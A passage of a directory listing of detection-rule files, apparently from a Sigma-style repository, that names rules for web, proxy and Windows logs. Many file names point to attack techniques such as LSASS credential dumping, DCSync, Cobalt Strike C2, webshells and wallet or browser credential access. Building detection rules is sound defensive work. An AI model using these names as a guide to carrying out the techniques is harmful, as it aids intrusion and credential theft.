│ │ │ │ └── web_apache_threading_error.yml
│ │ │ └── nginx/
│ │ │ └── web_nginx_core_dump.yml
│ │ ├── proxy_generic/
│ │ │ ├── proxy_download_susp_dyndns.yml
│ │ │ ├── proxy_download_susp_tlds_blacklist.yml
│ │ │ ├── proxy_download_susp_tlds_whitelist.yml
│ │ │ ├── proxy_downloadcradle_webdav.yml
│ │ │ ├── proxy_f5_tm_utility_bash_api_request.yml
│ │ │ ├── proxy_hello_world_user_agent.yml
│ │ │ ├── proxy_hktl_baby_shark_default_agent_url.yml
│ │ │ ├── proxy_hktl_cobalt_strike_malleable_c2_requests.yml
│ │ │ ├── proxy_hktl_empire_ua_uri_patterns.yml
│ │ │ ├── proxy_pua_advanced_ip_scanner_update_check.yml
│ │ │ ├── proxy_pwndrop.yml
│ │ │ ├── proxy_raw_paste_service_access.yml
│ │ │ ├── proxy_susp_flash_download_loc.yml
│ │ │ ├── proxy_susp_ipfs_cred_harvest.yml
│ │ │ ├── proxy_telegram_api.yml
│ │ │ ├── proxy_ua_apt.yml
│ │ │ ├── proxy_ua_base64_encoded.yml
│ │ │ ├── proxy_ua_bitsadmin_susp_ip.yml
│ │ │ ├── proxy_ua_bitsadmin_susp_tld.yml
│ │ │ ├── proxy_ua_cryptominer.yml
│ │ │ ├── proxy_ua_empty.yml
│ │ │ ├── proxy_ua_frameworks.yml
│ │ │ ├── proxy_ua_hacktool.yml
│ │ │ ├── proxy_ua_malware.yml
│ │ │ ├── proxy_ua_powershell.yml
│ │ │ ├── proxy_ua_rclone.yml
│ │ │ ├── proxy_ua_susp.yml
│ │ │ ├── proxy_ua_susp_base64.yml
│ │ │ └── proxy_webdav_external_execution.yml
│ │ └── webserver_generic/
│ │ ├── web_f5_tm_utility_bash_api_request.yml
│ │ ├── web_iis_tilt_shortname_scan.yml
│ │ ├── web_java_payload_in_access_logs.yml
│ │ ├── web_jndi_exploit.yml
│ │ ├── web_path_traversal_exploitation_attempt.yml
│ │ ├── web_source_code_enumeration.yml
│ │ ├── web_sql_injection_in_access_logs.yml
│ │ ├── web_ssti_in_access_logs.yml
│ │ ├── web_susp_useragents.yml
│ │ ├── web_susp_windows_path_uri.yml
│ │ ├── web_webshell_regeorg.yml
│ │ ├── web_win_webshells_in_access_logs.yml
│ │ └── web_xss_in_access_logs.yml
│ └── windows/
│ ├── builtin/
│ │ ├── application/
│ │ │ ├── Other/
│ │ │ │ └── win_av_relevant_match.yml
│ │ │ ├── application_error/
│ │ │ │ ├── win_application_error_lsass_crash.yml
│ │ │ │ └── win_application_error_msmpeng_crash.yml
│ │ │ ├── esent/
│ │ │ │ ├── win_esent_ntdsutil_abuse.yml
│ │ │ │ └── win_esent_ntdsutil_abuse_susp_location.yml
│ │ │ ├── microsoft-windows_audit_cve/
│ │ │ │ └── win_audit_cve.yml
│ │ │ ├── microsoft_windows_backup/
│ │ │ │ └── win_susp_backup_delete.yml
│ │ │ ├── microsoft_windows_software_restriction_policies/
│ │ │ │ └── win_software_restriction_policies_block.yml
│ │ │ ├── msiinstaller/
│ │ │ │ ├── win_builtin_remove_application.yml
│ │ │ │ ├── win_msi_install_from_susp_locations.yml
│ │ │ │ ├── win_msi_install_from_web.yml
│ │ │ │ └── win_software_atera_rmm_agent_install.yml
│ │ │ ├── mssqlserver/
│ │ │ │ ├── win_mssql_add_sysadmin_account.yml
│ │ │ │ ├── win_mssql_destructive_query.yml
│ │ │ │ ├── win_mssql_disable_audit_settings.yml
│ │ │ │ ├── win_mssql_failed_logon.yml
│ │ │ │ ├── win_mssql_failed_logon_from_external_network.yml
│ │ │ │ ├── win_mssql_sp_procoption_set.yml
│ │ │ │ ├── win_mssql_xp_cmdshell_audit_log.yml
│ │ │ │ └── win_mssql_xp_cmdshell_change.yml
│ │ │ ├── screenconnect/
│ │ │ │ ├── win_app_remote_access_tools_screenconnect_command_exec.yml
│ │ │ │ └── win_app_remote_access_tools_screenconnect_file_transfer.yml
│ │ │ └── windows_error_reporting/
│ │ │ └── win_application_msmpeng_crash_wer.yml
│ │ ├── applocker/
│ │ │ └── win_applocker_application_was_prevented_from_running.yml
│ │ ├── appmodel_runtime/
│ │ │ └── win_appmodel_runtime_sysinternals_tools_appx_execution.yml
│ │ ├── appxdeployment_server/
│ │ │ ├── win_appxdeployment_server_applocker_block.yml
│ │ │ ├── win_appxdeployment_server_appx_downloaded_from_file_sharing_domains.yml
│ │ │ ├── win_appxdeployment_server_appx_package_deployment_failed_signing_requirements.yml
│ │ │ ├── win_appxdeployment_server_appx_package_in_staging_directory.yml
│ │ │ ├── win_appxdeployment_server_mal_appx_names.yml
│ │ │ ├── win_appxdeployment_server_policy_block.yml
│ │ │ ├── win_appxdeployment_server_uncommon_package_locations.yml
│ │ │ ├── win_appxpackaging_server_full_trust_package_installation.yml
│ │ │ └── win_appxpackaging_server_unsigned_package_installation.yml
│ │ ├── appxpackaging_om/
│ │ │ └── win_appxpackaging_om_sups_appx_signature.yml
│ │ ├── bits_client/
│ │ │ ├── win_bits_client_new_job_via_bitsadmin.yml
│ │ │ ├── win_bits_client_new_job_via_powershell.yml
│ │ │ ├── win_bits_client_new_transfer_saving_susp_extensions.yml
│ │ │ ├── win_bits_client_new_transfer_via_file_sharing_domains.yml
│ │ │ ├── win_bits_client_new_transfer_via_ip_address.yml
│ │ │ ├── win_bits_client_new_transfer_via_uncommon_tld.yml
│ │ │ └── win_bits_client_new_trasnfer_susp_local_folder.yml
│ │ ├── capi2/
│ │ │ └── win_capi2_acquire_certificate_private_key.yml
│ │ ├── certificate_services_client_lifecycle_system/
│ │ │ └── win_certificateservicesclient_lifecycle_system_cert_exported.yml
│ │ ├── code_integrity/
│ │ │ ├── win_codeintegrity_attempted_dll_load.yml
│ │ │ ├── win_codeintegrity_blocked_protected_process_file.yml
│ │ │ ├── win_codeintegrity_enforced_policy_block.yml
│ │ │ ├── win_codeintegrity_revoked_driver_blocked.yml
│ │ │ ├── win_codeintegrity_revoked_driver_loaded.yml
│ │ │ ├── win_codeintegrity_revoked_image_blocked.yml
│ │ │ ├── win_codeintegrity_revoked_image_loaded.yml
│ │ │ ├── win_codeintegrity_unsigned_driver_loaded.yml
│ │ │ ├── win_codeintegrity_unsigned_image_loaded.yml
│ │ │ └── win_codeintegrity_whql_failure.yml
│ │ ├── diagnosis/
│ │ │ └── scripted/
│ │ │ └── win_diagnosis_scripted_load_remote_diagcab.yml
│ │ ├── dns_client/
│ │ │ ├── win_dns_client_anonymfiles_com.yml
│ │ │ ├── win_dns_client_mal_cobaltstrike.yml
│ │ │ ├── win_dns_client_mega_nz.yml
│ │ │ ├── win_dns_client_put_io.yml
│ │ │ ├── win_dns_client_tor_onion.yml
│ │ │ └── win_dns_client_ufile_io.yml
│ │ ├── dns_server/
│ │ │ ├── win_dns_server_failed_dns_zone_transfer.yml
│ │ │ └── win_dns_server_susp_server_level_plugin_dll.yml
│ │ ├── driverframeworks/
│ │ │ └── win_usb_device_plugged.yml
│ │ ├── firewall_as/
│ │ │ ├── win_firewall_as_add_rule.yml
│ │ │ ├── win_firewall_as_add_rule_susp_folder.yml
│ │ │ ├── win_firewall_as_add_rule_wmiprvse.yml
│ │ │ ├── win_firewall_as_delete_all_rules.yml
│ │ │ ├── win_firewall_as_delete_rule.yml
│ │ │ ├── win_firewall_as_failed_load_gpo.yml
│ │ │ ├── win_firewall_as_reset_config.yml
│ │ │ └── win_firewall_as_setting_change.yml
│ │ ├── iis-configuration/
│ │ │ ├── win_iis_logging_etw_disabled.yml
│ │ │ ├── win_iis_logging_http_disabled.yml
│ │ │ ├── win_iis_module_added.yml
│ │ │ └── win_iis_module_removed.yml
│ │ ├── ldap/
│ │ │ └── win_ldap_recon.yml
│ │ ├── lsa_server/
│ │ │ └── win_lsa_server_normal_user_admin.yml
│ │ ├── msexchange/
│ │ │ ├── win_exchange_proxylogon_oabvirtualdir.yml
│ │ │ ├── win_exchange_proxyshell_certificate_generation.yml
│ │ │ ├── win_exchange_proxyshell_mailbox_export.yml
│ │ │ ├── win_exchange_proxyshell_remove_mailbox_export.yml
│ │ │ ├── win_exchange_set_oabvirtualdirectory_externalurl.yml
│ │ │ ├── win_exchange_transportagent.yml
│ │ │ └── win_exchange_transportagent_failed.yml
│ │ ├── ntlm/
│ │ │ ├── win_susp_ntlm_auth.yml
│ │ │ ├── win_susp_ntlm_brute_force.yml
│ │ │ └── win_susp_ntlm_rdp.yml
│ │ ├── openssh/
│ │ │ └── win_sshd_openssh_server_listening_on_socket.yml
│ │ ├── security/
│ │ │ ├── account_management/
│ │ │ │ ├── win_security_access_token_abuse.yml
│ │ │ │ ├── win_security_admin_rdp_login.yml
│ │ │ │ ├── win_security_diagtrack_eop_default_login_username.yml
│ │ │ │ ├── win_security_member_added_security_enabled_global_group.yml
│ │ │ │ ├── win_security_member_removed_security_enabled_global_group.yml
│ │ │ │ ├── win_security_overpass_the_hash.yml
│ │ │ │ ├── win_security_pass_the_hash_2.yml
│ │ │ │ ├── win_security_rdp_localhost_login.yml
│ │ │ │ ├── win_security_security_enabled_global_group_deleted.yml
│ │ │ │ ├── win_security_successful_external_remote_rdp_login.yml
│ │ │ │ ├── win_security_successful_external_remote_smb_login.yml
│ │ │ │ ├── win_security_susp_failed_logon_source.yml
│ │ │ │ ├── win_security_susp_logon_newcredentials.yml
│ │ │ │ ├── win_security_susp_privesc_kerberos_relay_over_ldap.yml
│ │ │ │ ├── win_security_susp_rottenpotato.yml
│ │ │ │ └── win_security_susp_wmi_login.yml
│ │ │ ├── object_access/
│ │ │ │ └── win_security_wfp_endpoint_agent_blocked.yml
│ │ │ ├── win_security_aadhealth_mon_agent_regkey_access.yml
│ │ │ ├── win_security_aadhealth_svc_agent_regkey_access.yml
│ │ │ ├── win_security_account_backdoor_dcsync_rights.yml
│ │ │ ├── win_security_account_discovery.yml
│ │ │ ├── win_security_ad_object_writedac_access.yml
│ │ │ ├── win_security_ad_replication_non_machine_account.yml
│ │ │ ├── win_security_ad_user_enumeration.yml
│ │ │ ├── win_security_adcs_certificate_template_configuration_vulnerability.yml
│ │ │ ├── win_security_adcs_certificate_template_configuration_vulnerability_eku.yml
│ │ │ ├── win_security_add_remove_computer.yml
│ │ │ ├── win_security_admin_share_access.yml
│ │ │ ├── win_security_alert_active_directory_user_control.yml
│ │ │ ├── win_security_alert_ad_user_backdoors.yml
│ │ │ ├── win_security_alert_enable_weak_encryption.yml
│ │ │ ├── win_security_alert_ruler.yml
│ │ │ ├── win_security_atsvc_task.yml
│ │ │ ├── win_security_audit_log_cleared.yml
│ │ │ ├── win_security_camera_microphone_access.yml
│ │ │ ├── win_security_cobaltstrike_service_installs.yml
│ │ │ ├── win_security_codeintegrity_check_failure.yml
│ │ │ ├── win_security_dce_rpc_smb_spoolss_named_pipe.yml
│ │ │ ├── win_security_dcom_iertutil_dll_hijack.yml
│ │ │ ├── win_security_dcsync.yml
│ │ │ ├── win_security_default_domain_gpo_modification.yml
│ │ │ ├── win_security_device_installation_blocked.yml
│ │ │ ├── win_security_disable_event_auditing.yml
│ │ │ ├── win_security_disable_event_auditing_critical.yml
│ │ │ ├── win_security_dot_net_etw_tamper.yml
│ │ │ ├── win_security_dpapi_domain_backupkey_extraction.yml
│ │ │ ├── win_security_dpapi_domain_masterkey_backup_attempt.yml
│ │ │ ├── win_security_external_device.yml
│ │ │ ├── win_security_gpo_scheduledtasks.yml
│ │ │ ├── win_security_hidden_user_creation.yml
│ │ │ ├── win_security_hktl_edr_silencer.yml
│ │ │ ├── win_security_hktl_nofilter.yml
│ │ │ ├── win_security_hybridconnectionmgr_svc_installation.yml
│ │ │ ├── win_security_impacket_psexec.yml
│ │ │ ├── win_security_impacket_secretdump.yml
│ │ │ ├── win_security_invoke_obfuscation_clip_services_security.yml
│ │ │ ├── win_security_invoke_obfuscation_obfuscated_iex_services_security.yml
│ │ │ ├── win_security_invoke_obfuscation_stdin_services_security.yml
│ │ │ ├── win_security_invoke_obfuscation_var_services_security.yml
│ │ │ ├── win_security_invoke_obfuscation_via_compress_services_security.yml
│ │ │ ├── win_security_invoke_obfuscation_via_rundll_services_security.yml
│ │ │ ├── win_security_invoke_obfuscation_via_stdin_services_security.yml
│ │ │ ├── win_security_invoke_obfuscation_via_use_clip_services_security.yml
│ │ │ ├── win_security_invoke_obfuscation_via_use_mshta_services_security.yml
│ │ │ ├── win_security_invoke_obfuscation_via_use_rundll32_services_security.yml
│ │ │ ├── win_security_invoke_obfuscation_via_var_services_security.yml
│ │ │ ├── win_security_iso_mount.yml
│ │ │ ├── win_security_kerberoasting_activity.yml
│ │ │ ├── win_security_kerberos_asrep_roasting.yml
│ │ │ ├── win_security_kerberos_coercion_via_dns_object.yml
│ │ │ ├── win_security_lm_namedpipe.yml
│ │ │ ├── win_security_lsass_access_non_system_account.yml
│ │ │ ├── win_security_mal_creddumper.yml
│ │ │ ├── win_security_mal_wceaux_dll.yml
│ │ │ ├── win_security_metasploit_authentication.yml
│ │ │ ├── win_security_metasploit_or_impacket_smb_psexec_service_install.yml
│ │ │ ├── win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml
│ │ │ ├── win_security_net_ntlm_downgrade.yml
│ │ │ ├── win_security_net_share_obj_susp_desktop_ini.yml
│ │ │ ├── win_security_new_or_renamed_user_account_with_dollar_sign.yml
│ │ │ ├── win_security_not_allowed_rdp_access.yml
│ │ │ ├── win_security_password_policy_enumerated.yml
│ │ │ ├── win_security_pcap_drivers.yml
│ │ │ ├── win_security_petitpotam_network_share.yml
│ │ │ ├── win_security_petitpotam_susp_tgt_request.yml
│ │ │ ├── win_security_possible_dc_shadow.yml
│ │ │ ├── win_security_powershell_script_installed_as_service.yml
│ │ │ ├── win_security_protected_storage_service_access.yml
│ │ │ ├── win_security_rdp_reverse_tunnel.yml
│ │ │ ├── win_security_register_new_logon_process_by_rubeus.yml
│ │ │ ├── win_security_registry_permissions_weakness_check.yml
│ │ │ ├── win_security_remote_powershell_session.yml
│ │ │ ├── win_security_replay_attack_detected.yml
│ │ │ ├── win_security_sam_registry_hive_handle_request.yml
│ │ │ ├── win_security_scm_database_handle_failure.yml
│ │ │ ├── win_security_scm_database_privileged_operation.yml
│ │ │ ├── win_security_sdelete_potential_secure_deletion.yml
│ │ │ ├── win_security_service_install_remote_access_software.yml
│ │ │ ├── win_security_service_installation_by_unusal_client.yml
│ │ │ ├── win_security_signal_sensitive_config_access.yml
│ │ │ ├── win_security_smb_file_creation_admin_shares.yml
│ │ │ ├── win_security_susp_add_domain_trust.yml
│ │ │ ├── win_security_susp_add_sid_history.yml
│ │ │ ├── win_security_susp_computer_name.yml
│ │ │ ├── win_security_susp_dsrm_password_change.yml
│ │ │ ├── win_security_susp_failed_logon_reasons.yml
│ │ │ ├── win_security_susp_group_policy_abuse_privilege_addition.yml
│ │ │ ├── win_security_susp_group_policy_startup_script_added_to_gpo.yml
│ │ │ ├── win_security_susp_kerberos_manipulation.yml
│ │ │ ├── win_security_susp_ldap_dataexchange.yml
│ │ │ ├── win_security_susp_local_anon_logon_created.yml
│ │ │ ├── win_security_susp_logon_explicit_credentials.yml
│ │ │ ├── win_security_susp_lsass_dump.yml
│ │ │ ├── win_security_susp_lsass_dump_generic.yml
│ │ │ ├── win_security_susp_net_recon_activity.yml
│ │ │ ├── win_security_susp_opened_encrypted_zip.yml
│ │ │ ├── win_security_susp_opened_encrypted_zip_filename.yml
│ │ │ ├── win_security_susp_opened_encrypted_zip_outlook.yml
│ │ │ ├── win_security_susp_outbound_kerberos_connection.yml
│ │ │ ├── win_security_susp_possible_shadow_credentials_added.yml
│ │ │ ├── win_security_susp_psexec.yml
│ │ │ ├── win_security_susp_raccess_sensitive_fext.yml
│ │ │ ├── win_security_susp_rc4_kerberos.yml
│ │ │ ├── win_security_susp_scheduled_task_creation.yml
│ │ │ ├── win_security_susp_scheduled_task_delete_or_disable.yml
│ │ │ ├── win_security_susp_scheduled_task_update.yml
│ │ │ ├── win_security_susp_time_modification.yml
│ │ │ ├── win_security_svcctl_remote_service.yml
│ │ │ ├── win_security_syskey_registry_access.yml
│ │ │ ├── win_security_sysmon_channel_reference_deletion.yml
│ │ │ ├── win_security_tap_driver_installation.yml
│ │ │ ├── win_security_teams_suspicious_objectaccess.yml
│ │ │ ├── win_security_transf_files_with_cred_data_via_network_shares.yml
│ │ │ ├── win_security_user_added_to_local_administrators.yml
│ │ │ ├── win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml
│ │ │ ├── win_security_user_creation.yml
│ │ │ ├── win_security_user_driver_loaded.yml
│ │ │ ├── win_security_user_logoff.yml
│ │ │ ├── win_security_vssaudit_secevent_source_registration.yml
│ │ │ ├── win_security_windows_defender_exclusions_registry_modified.yml
│ │ │ ├── win_security_windows_defender_exclusions_write_access.yml
│ │ │ ├── win_security_wmi_persistence.yml
│ │ │ ├── win_security_wmiprvse_wbemcomn_dll_hijack.yml
│ │ │ └── win_security_workstation_was_locked.yml
│ │ ├── security_mitigations/
│ │ │ ├── win_security_mitigations_defender_load_unsigned_dll.yml
│ │ │ └── win_security_mitigations_unsigned_dll_from_susp_location.yml
│ │ ├── servicebus/
│ │ │ └── win_hybridconnectionmgr_svc_running.yml
│ │ ├── shell_core/
│ │ │ └── win_shell_core_susp_packages_installed.yml
│ │ ├── smbclient/
│ │ │ └── security/
│ │ │ └── win_smbclient_security_susp_failed_guest_logon.yml
│ │ ├── smbserver/
│ │ │ └── connectivity/
│ │ │ └── win_smbserver_connectivity_unsigned_and_unencrypted_share_connection.yml
│ │ ├── system/
│ │ │ ├── application_popup/
│ │ │ │ └── win_system_application_sysmon_crash.yml
│ │ │ ├── lsasrv/
│ │ │ │ └── win_system_lsasrv_ntlmv1.yml
│ │ │ ├── microsoft_windows_Iphlpsvc/
│ │ │ │ └── win_system_isatap_router_address_set.yml
│ │ │ ├── microsoft_windows_certification_authority/
│ │ │ │ └── win_system_adcs_enrollment_request_denied.yml
│ │ │ ├── microsoft_windows_dhcp_server/
│ │ │ │ ├── win_system_susp_dhcp_config.yml
│ │ │ │ └── win_system_susp_dhcp_config_failed.yml
│ │ │ ├── microsoft_windows_distributed_com/
│ │ │ │ └── win_system_lpe_indicators_tabtip.yml
│ │ │ ├── microsoft_windows_eventlog/
│ │ │ │ ├── win_system_eventlog_cleared.yml
│ │ │ │ └── win_system_susp_eventlog_cleared.yml
│ │ │ ├── microsoft_windows_kerberos_key_distribution_center/
│ │ │ │ ├── win_system_kdcsvc_cert_use_no_strong_mapping.yml
│ │ │ │ └── win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml
│ │ │ ├── microsoft_windows_kernel_general/
│ │ │ │ └── win_system_susp_critical_hive_location_access_bits_cleared.yml
│ │ │ ├── microsoft_windows_ntfs/
│ │ │ │ └── win_system_volume_shadow_copy_mount.yml
│ │ │ ├── microsoft_windows_wer_systemerrorreporting/
│ │ │ │ └── win_system_crash_dump_created.yml
│ │ │ ├── microsoft_windows_windows_update_client/
│ │ │ │ └── win_system_susp_system_update_error.yml
│ │ │ ├── netlogon/
│ │ │ │ ├── win_system_possible_zerologon_exploitation_using_wellknown_tools.yml
│ │ │ │ └── win_system_vul_cve_2020_1472.yml
│ │ │ ├── ntfs/
│ │ │ │ └── win_system_ntfs_vuln_exploit.yml
│ │ │ └── service_control_manager/
│ │ │ ├── win_system_cobaltstrike_service_installs.yml
│ │ │ ├── win_system_defender_disabled.yml
│ │ │ ├── win_system_hack_smbexec.yml
│ │ │ ├── win_system_invoke_obfuscation_clip_services.yml
│ │ │ ├── win_system_invoke_obfuscation_obfuscated_iex_services.yml
│ │ │ ├── win_system_invoke_obfuscation_stdin_services.yml
│ │ │ ├── win_system_invoke_obfuscation_var_services.yml
│ │ │ ├── win_system_invoke_obfuscation_via_compress_services.yml
│ │ │ ├── win_system_invoke_obfuscation_via_rundll_services.yml
│ │ │ ├── win_system_invoke_obfuscation_via_stdin_services.yml
│ │ │ ├── win_system_invoke_obfuscation_via_use_clip_services.yml
│ │ │ ├── win_system_invoke_obfuscation_via_use_mshta_services.yml
│ │ │ ├── win_system_invoke_obfuscation_via_use_rundll32_services.yml
│ │ │ ├── win_system_invoke_obfuscation_via_var_services.yml
│ │ │ ├── win_system_krbrelayup_service_installation.yml
│ │ │ ├── win_system_mal_creddumper.yml
│ │ │ ├── win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
│ │ │ ├── win_system_moriya_rootkit.yml
│ │ │ ├── win_system_powershell_script_installed_as_service.yml
│ │ │ ├── win_system_service_install_anydesk.yml
│ │ │ ├── win_system_service_install_csexecsvc.yml
│ │ │ ├── win_system_service_install_hacktools.yml
│ │ │ ├── win_system_service_install_mesh_agent.yml
│ │ │ ├── win_system_service_install_netsupport_manager.yml
│ │ │ ├── win_system_service_install_paexec.yml
│ │ │ ├── win_system_service_install_pdqdeploy.yml
│ │ │ ├── win_system_service_install_pdqdeploy_runner.yml
│ │ │ ├── win_system_service_install_pua_proceshacker.yml
│ │ │ ├── win_system_service_install_remcom.yml
│ │ │ ├── win_system_service_install_remote_access_software.yml
│ │ │ ├── win_system_service_install_remote_utilities.yml
│ │ │ ├── win_system_service_install_sliver.yml
│ │ │ ├── win_system_service_install_sups_unusal_client.yml
│ │ │ ├── win_system_service_install_susp.yml
│ │ │ ├── win_system_service_install_sysinternals_psexec.yml
│ │ │ ├── win_system_service_install_tacticalrmm.yml
│ │ │ ├── win_system_service_install_tap_driver.yml
│ │ │ ├── win_system_service_install_uncommon.yml
│ │ │ ├── win_system_service_terminated_error_generic.yml
│ │ │ ├── win_system_service_terminated_error_important.yml
│ │ │ ├── win_system_service_terminated_unexpectedly.yml
│ │ │ ├── win_system_susp_rtcore64_service_install.yml
│ │ │ ├── win_system_susp_service_installation_folder.yml
│ │ │ ├── win_system_susp_service_installation_folder_pattern.yml
│ │ │ └── win_system_susp_service_installation_script.yml
│ │ ├── taskscheduler/
│ │ │ ├── win_taskscheduler_execution_from_susp_locations.yml
│ │ │ ├── win_taskscheduler_lolbin_execution_via_task_scheduler.yml
│ │ │ └── win_taskscheduler_susp_schtasks_delete.yml
│ │ ├── terminalservices/
│ │ │ └── win_terminalservices_rdp_ngrok.yml
│ │ ├── win_alert_mimikatz_keywords.yml
│ │ ├── windefend/
│ │ │ ├── win_defender_antimalware_platform_expired.yml
│ │ │ ├── win_defender_asr_lsass_access.yml
│ │ │ ├── win_defender_asr_psexec_wmi.yml
│ │ │ ├── win_defender_config_change_exclusion_added.yml
│ │ │ ├── win_defender_config_change_exploit_guard_tamper.yml
│ │ │ ├── win_defender_config_change_sample_submission_consent.yml
│ │ │ ├── win_defender_history_delete.yml
│ │ │ ├── win_defender_malware_and_pua_scan_disabled.yml
│ │ │ ├── win_defender_malware_detected_amsi_source.yml
│ │ │ ├── win_defender_real_time_protection_disabled.yml
│ │ │ ├── win_defender_real_time_protection_errors.yml
│ │ │ ├── win_defender_restored_quarantine_file.yml
│ │ │ ├── win_defender_suspicious_features_tampering.yml
│ │ │ ├── win_defender_tamper_protection_trigger.yml
│ │ │ ├── win_defender_threat.yml
│ │ │ └── win_defender_virus_scan_disabled.yml
│ │ └── wmi/
│ │ └── win_wmi_persistence.yml
│ ├── create_remote_thread/
│ │ ├── create_remote_thread_win_hktl_cactustorch.yml
│ │ ├── create_remote_thread_win_hktl_cobaltstrike.yml
│ │ ├── create_remote_thread_win_keepass.yml
│ │ ├── create_remote_thread_win_mstsc_susp_location.yml
│ │ ├── create_remote_thread_win_powershell_lsass.yml
│ │ ├── create_remote_thread_win_powershell_susp_targets.yml
│ │ ├── create_remote_thread_win_susp_password_dumper_lsass.yml
│ │ ├── create_remote_thread_win_susp_relevant_source_image.yml
│ │ ├── create_remote_thread_win_susp_uncommon_source_image.yml
│ │ ├── create_remote_thread_win_susp_uncommon_target_image.yml
│ │ └── create_remote_thread_win_ttdinjec.yml
│ ├── create_stream_hash/
│ │ ├── create_stream_hash_ads_executable.yml
│ │ ├── create_stream_hash_creation_internet_file.yml
│ │ ├── create_stream_hash_file_sharing_domains_download_susp_extension.yml
│ │ ├── create_stream_hash_file_sharing_domains_download_unusual_extension.yml
│ │ ├── create_stream_hash_hktl_generic_download.yml
│ │ ├── create_stream_hash_regedit_export_to_ads.yml
│ │ ├── create_stream_hash_susp_ip_domains.yml
│ │ ├── create_stream_hash_winget_susp_package_source.yml
│ │ └── create_stream_hash_zip_tld_download.yml
│ ├── dns_query/
│ │ ├── dns_query_win_anonymfiles_com.yml
│ │ ├── dns_query_win_appinstaller.yml
│ │ ├── dns_query_win_cloudflared_communication.yml
│ │ ├── dns_query_win_common_malware_hosting_services.yml
│ │ ├── dns_query_win_devtunnels_communication.yml
│ │ ├── dns_query_win_dns_server_discovery_via_ldap_query.yml
│ │ ├── dns_query_win_domain_azurewebsites.yml
│ │ ├── dns_query_win_finger.yml
│ │ ├── dns_query_win_gup_query_to_uncommon_domains.yml
│ │ ├── dns_query_win_hybridconnectionmgr_servicebus.yml
│ │ ├── dns_query_win_kerberos_coercion_via_dns_object_spoofing.yml
│ │ ├── dns_query_win_mal_cobaltstrike.yml
│ │ ├── dns_query_win_mega_nz.yml
│ │ ├── dns_query_win_onelaunch_update_service.yml
│ │ ├── dns_query_win_quickassist.yml
│ │ ├── dns_query_win_regsvr32_dns_query.yml
│ │ ├── dns_query_win_remote_access_software_domains_non_browsers.yml
│ │ ├── dns_query_win_susp_external_ip_lookup.yml
│ │ ├── dns_query_win_teamviewer_domain_query_by_uncommon_app.yml
│ │ ├── dns_query_win_tor_onion_domain_query.yml
│ │ ├── dns_query_win_ufile_io_query.yml
│ │ └── dns_query_win_vscode_tunnel_communication.yml
│ ├── driver_load/
│ │ ├── driver_load_win_mal_drivers.yml
│ │ ├── driver_load_win_mal_drivers_names.yml
│ │ ├── driver_load_win_pua_process_hacker.yml
│ │ ├── driver_load_win_pua_system_informer.yml
│ │ ├── driver_load_win_susp_temp_use.yml
│ │ ├── driver_load_win_vuln_drivers.yml
│ │ ├── driver_load_win_vuln_drivers_names.yml
│ │ ├── driver_load_win_vuln_hevd_driver.yml
│ │ ├── driver_load_win_vuln_winring0_driver.yml
│ │ └── driver_load_win_windivert.yml
│ ├── file/
│ │ ├── file_access/
│ │ │ ├── file_access_win_susp_credential_manager_access.yml
│ │ │ ├── file_access_win_susp_credhist.yml
│ │ │ ├── file_access_win_susp_crypto_currency_wallets.yml
│ │ │ ├── file_access_win_susp_dpapi_master_key_access.yml
│ │ │ ├── file_access_win_susp_gpo_files.yml
│ │ │ ├── file_access_win_susp_process_access_browser_cred_files.yml
│ │ │ └── file_access_win_teams_sensitive_files.yml
│ │ ├── file_change/
│ │ │ └── file_change_win_unusual_modification_by_dns_exe.yml
│ │ ├── file_delete/
│ │ │ ├── file_delete_win_delete_backup_file.yml
│ │ │ ├── file_delete_win_delete_event_log_files.yml
│ │ │ ├── file_delete_win_delete_exchange_powershell_logs.yml
│ │ │ ├── file_delete_win_delete_iis_access_logs.yml
│ │ │ ├── file_delete_win_delete_own_image.yml
│ │ │ ├── file_delete_win_delete_powershell_command_history.yml
│ │ │ ├── file_delete_win_delete_prefetch.yml
│ │ │ ├── file_delete_win_delete_teamviewer_logs.yml
│ │ │ ├── file_delete_win_delete_tomcat_logs.yml
│ │ │ ├── file_delete_win_sysinternals_sdelete_file_deletion.yml
│ │ │ ├── file_delete_win_unusual_deletion_by_dns_exe.yml
│ │ │ └── file_delete_win_zone_identifier_ads_uncommon.yml
│ │ ├── file_event/
│ │ │ ├── file_event_win_adsi_cache_creation_by_uncommon_tool.yml
│ │ │ ├── file_event_win_advanced_ip_scanner.yml
│ │ │ ├── file_event_win_anydesk_artefact.yml
│ │ │ ├── file_event_win_anydesk_writing_susp_binaries.yml
│ │ │ ├── file_event_win_arcsoc_susp_file_created.yml
│ │ │ ├── file_event_win_aspnet_temp_files.yml
│ │ │ ├── file_event_win_bloodhound_collection.yml
│ │ │ ├── file_event_win_comodo_itsm_potentially_suspicious_file_creation.yml
│ │ │ ├── file_event_win_create_evtx_non_common_locations.yml
│ │ │ ├── file_event_win_create_non_existent_dlls.yml
│ │ │ ├── file_event_win_creation_deno.yml
│ │ │ ├── file_event_win_creation_new_shim_database.yml
│ │ │ ├── file_event_win_creation_scr_binary_file.yml
│ │ │ ├── file_event_win_creation_system_dll_files.yml
│ │ │ ├── file_event_win_creation_system_file.yml
│ │ │ ├── file_event_win_creation_unquoted_service_path.yml
│ │ │ ├── file_event_win_cred_dump_tools_dropped_files.yml
│ │ │ ├── file_event_win_cscript_wscript_dropper.yml
│ │ │ ├── file_event_win_csexec_service.yml
│ │ │ ├── file_event_win_csharp_compile_artefact.yml
│ │ │ ├── file_event_win_dcom_iertutil_dll_hijack.yml
│ │ │ ├── file_event_win_desktop_ini_created_by_uncommon_process.yml
│ │ │ ├── file_event_win_dll_sideloading_space_path.yml
│ │ │ ├── file_event_win_dump_file_susp_creation.yml
│ │ │ ├── file_event_win_errorhandler_persistence.yml
│ │ │ ├── file_event_win_exchange_webshell_drop.yml
│ │ │ ├── file_event_win_exchange_webshell_drop_suspicious.yml
│ │ │ ├── file_event_win_gotoopener_artefact.yml
│ │ │ ├── file_event_win_gup_uncommon_file_creation.yml
│ │ │ ├── file_event_win_hktl_crackmapexec_indicators.yml
│ │ │ ├── file_event_win_hktl_dumpert.yml
│ │ │ ├── file_event_win_hktl_hivenightmare_file_exports.yml
│ │ │ ├── file_event_win_hktl_inveigh_artefacts.yml
│ │ │ ├── file_event_win_hktl_krbrelay_remote_ioc.yml
│ │ │ ├── file_event_win_hktl_mimikatz_files.yml
│ │ │ ├── file_event_win_hktl_nppspy.yml
│ │ │ ├── file_event_win_hktl_powerup_dllhijacking.yml
